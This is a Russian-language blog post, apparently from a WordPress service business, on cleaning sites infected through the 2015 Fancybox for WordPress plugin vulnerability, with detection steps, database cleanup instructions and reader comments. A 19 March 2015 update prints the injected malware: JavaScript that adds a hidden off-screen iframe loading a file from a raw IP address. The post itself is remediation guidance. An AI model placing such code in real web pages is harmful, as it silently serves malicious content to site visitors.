Уязвимость WordPress через плагин Fancybox for WordPress. Как лечить Zero day in the Fancybox-for-WordPress

Zero day in the Fancybox for WordPress

5 февраля 2015 года была обнаружена уязвимость плагина Fancybox for WordPress, через который вставлялся вредоносный код на WordPress сайт. Вредоносный iframe был замечен на большинстве сайтов с активным Fancybox for WordPress до версии 3.0.2 включительно. Версия плагина 3.0.4 (есть сведения что все таки взламывается) и 3.0.5 зараженными не были.

Активность вируса Zero day in the Fancybox-for-WordPress практически никак не проявлялась, просто в один прекрасный момент, заходя на свой сайт, вы получаете сообщение о заражении вашего ресурса, и что он атакует других пользователей. (Информация устаревшая, в конце поста свежая информация.  Сейчас вирус предлагает скачать вредоносные ПО если у вас нет антивируса)

Осторожно, вредоносное ПО!

Сайт может установить на ваш компьютер вредоносное ПО которое крадет или удаляет личную информацию.

Ситуация довольно таки досадная, особенно если вы потратили приличную суму на продвижение своего ресурса.

Обновлено с 03.03.2015

Нужно устанавливать последнею версию 3.0.6 или более новую если такие будут. Через версии 3.0.4 тоже происходит взлом сайта на wordpress.

Как обнаружить Zero day in the Fancybox-for-WordPress?

Если на вашем сайте был установлен старый плагин Fancybox for WordPress нужно проверить его на наличие вируса, сделать это достаточно просто, открываем свой сайт и нажимаем в мазиле или гугл хроме CTRL+U у вас откроется исходный код вашего сайта. Если вы там увидите код такого плана как на картинке var _0xd2d0=["ppkcookie","testcookie","match","userAgent","location":

вирус zero day in the Fancybox for WordPressваш сайт 100% заражен.

Также зайдя в админку WordPress можно перейти во вкладку "Настройки" - "Fancybox for WP" если там не будет кнопки "Сохранить" и "Сбросить настройки", как на картинке ниже:

нет кнопки сохранить в Fancybox for WordPressу вас на сайте троянская програма, добавленная через уязвимость WordPress "Zero-day".

 

Если тревога ложная и исходный код сайта выглядит как картинка ниже:

уязвимость wordpress через плагин 

можете спать спокойно!, для профилактики достаточно обновить WP до последней версии, а также обновить Fancybox for WordPress plugin. На этом можете прекращать читать статью, ставьте лайк автору и спешите обновить свой сайт.

Если сайт на WordPress все атки заражен, вам придется дочитать статью до конца и немного повозится.

 

Как удалить вредоносный iframe добавлен через уязвимость Zero day in the Fancybox-for-WordPress

Как вы поняли, вредоносный троян записан вам в базу, а посему простого обновления плагина Fancybox - не достаточно.

  1. Обновляем Вордпресс и все плагины.
  2. Открываем базу данных через phpMyAdmin (который установлен у вашей панели управления хостингом) или же качаем админнер с официального сайта ( www.adminer.org ) заливаем в корень по фтп и запускаем через адресную строку ваш_сайт.ру/скачанный-файл.php вводим логин пароль к базе, можно посмотреть в настройках wp-config.php
  3. Зашли в базу данных, делаем на всякий случай полную копию (Дамп)
  4. Открываем таблицу wp_options ищем такую запись: "mfbfw" "var _0xd2d0=" (может быть несколько, удаляем все как на рис. 4)
  5. Заходим в админку сайта, смотрим настройки плагина, должна появится кнопка "Сохранить" и в исходном коде должна пропасть вредоносная строчка iFrame

 

как лечить или удалить вирус zero day в плагине Fancybox for WordPress

Рис. 4 (как лечить / удалить Zero day Fancybox for WordPress)

 

Ваш сайт вылечен. Если вредоносный код остался после обновления, значит вы удалили не все вредоносные куски кода. ищите еще, для удобства можно воспользоваться CTRL+F

 

Вредоносный код, за данными гугл, не атакует компьютер пользователя и не получает вашей личной информации и доступов, он использует ваш сайт в цепочке атак, а по этому нужно не медленно его обезвредить.

На некоторых форумах советуют просто выключить плагин и удалить его, но в таком случае вредоносный код останется у вас в базе данных и никто не знает когда он сработает снова. Лучше удалить следы вируса раз и навсегда.

 

Узнать сколько стоит сайт на wordpress можно у нас на сайте.

 

Если по какой либо причине у вас не получается удалить троянский код напишите мне о своей проблема через форму обратной связи и я попробую вам помочь. (Обязательно указывайте ссылку на сайт)

Если эта статья была вам полезна жмите лайк

Последнее время пользователи обращаются с советом какая альтернатива есть вот этому плагину, советую прочесть статью lightbox WordPress там описан альтернативный плагин для всплывающих изображений.

 

Дополнение (обновлено 14.03.2015)

Как удалить троянскую программу Troj/JSRedir-QG

Есть очень большое подозрение на то, что новая версия Fancybox for WordPress 3.0.6 тоже уязвима к троянской программе (могу ошибаться, если заказчик обновил плагин до меня, хотя божится что ничего не делал 🙂 ).

Яндекс вебмастер называет этот вирус - как Troj/JSRedir-QG. Удаляется эта троянская программа описанным выше способом, достаточно войти в базу и удалить 1 или 2 строчки кода в таблице wp_options.

Надеюсь дополнение к этому посту: как удалить трояна Troj/JSRedir-QG ?, было вам полезно. Жмите лайк, и следите за этой новостью. Разработчики Fancybox for WordPress пока отстают с патчами своих траблов.

 

Дополнение (обновлено 19.03.2015)

Вирус, который начинался совсем безобидно, теперь по настоящему может принести вред вашему ПК и вашим посетителям. Следует незамедлительно обновлять плагин Fancybox for WordPress с уязвимостью Zero day. Код троянской программы постоянно меняется, сейчас он выглядит вот так:

if(!document.getElementById('googlezed4')) {
var elemDiv = document.createElement('div'); elemDiv.id = 'googlezed4'; document.body.appendChild(elemDiv); document.getElementById('googlezed4').innerHTML = '<iframe frameborder="0" style="position:absolute;left:-2837px;" width="7" height="5" src="http://162.247.14.168/security/SecurityInfo.doc"></iframe>'; }

Стоит опасаться всех всплывающих окон у вас на сайте, которых вы не ставили, это единственный способ обезопасить себя и обнаружит вирус.

Удалить вирус записанный через Zero day Fancybox for WordPress можно по прежнему так, как я описывал выше. Если у вас это не получится сделать, обращайтесь, поможем. Возможно, ваш пример станет новой страницей в моем блоге 🙂

 

Дополнение (обновлено 06.04.2015)

Вирус Fancybox продолжает усовершенствоваться, теперь он умеет атаковать пользователей на android, а так же может выводить "дурацкие" сообщения на главных и внутренних страницах сайта. Как я понимаю разработчики вируса тестируют его прям на живых сайтах пользователей, что еще больше усугубляет ситуацию. Написанный ранее код для поиска вируса не действительный, нужно смотреть каждый сайт с этим плагином в отдельности. Обнаружить вирус может владелец сайта случайно или когда гугл начнет кричать "ваш сайт заражен".

Напоминаем, что для того чтоб вирус вас не зацепил нужно обновить плагин Fancybox до последней версии. Перед этим надо проверить, может вирус уже у вас на сайте. Для этого можно обратиться к нам, мы сделаем проверку на наличие вируса бесплатно, с гарантией результата 70% или платно с последующим удалением, гарантия 99%.

Комментарии к записи «Уязвимость WordPress через плагин Fancybox for WordPress. Как лечить Zero day in the Fancybox-for-WordPress»:
  1. Инга:

    wordpress очень надежная система управления контентов, баги очень быстро закрываются, главное не откладывать на завтра то, что можно обновить сегодня 🙂 и будет вам гуд

    Сегодня взломали плагин фанцибокс, завтра какой нибудь другой. Не забывайте обновляться!!!

  2. Веб разработчик:

    5+ !!!! Удалось решить проблему.Реально помогло. До последней минуты думал что у меня нет вируса на сайте, но сегодня выскочило окошко со ссылкой на сторонний ресурс. Переходить по ссылке не стал так как я такой ерунды точно не добавлял, а кроме меня некому. 100% вирус пришел с плагина Fancybox для WP. Отключил все заработало без вируса. Нашел этот пост и удалил вредоносную запись с базы данных.все теперь отлично

  3. Александр:

    Браво! Вылечил подшефный сайт за 30 минут благодаря данной статье! Огромное спасибо за информацию!

  4. Харитон:

    Вот вам и безобидный плагин с трояном JSRedir-QG. Надо бежать всем клиентам говорить чтоб обновляли этот чудо плагин, пока беда не пришла и в их дом 🙁

    Как можно было этот плагин написать что его взломали ? даже отправки данных из пользователя никаких !!

  5. Смирнова Ирина:

    Яндекс вебмастер говорит что у меня на сайте троянская програма Troj/JSRedir-QG, вы описываете как удалить вирус Zero day in the Fancybox-for-WordPress это одно и тоже? или просто похожий режим удаления. Пробовала почему то не получилось. Было б не плохо посмотреть видео как это делается, или более подробные скины. Спасибо

  6. Андрей:

    Автор, исправьте плз. информацию, взлом сайта на wordpress через Fancybox for WordPress 3.0.4 - происходит. эта версия не защищенная.
    Мой сайт был взломан, стояла на тот момент последняя версия фанцибокс, это меня не спасло.

  7. Алексей:

    Тысячу спасибо автору! Потратил уйму времени. Понял, что гадина пришла вместе Fancybox, но не знал как снести, пока не наткнулся на статью. Реально помог!

Сделать заказ
Онлайн помощь по WordPress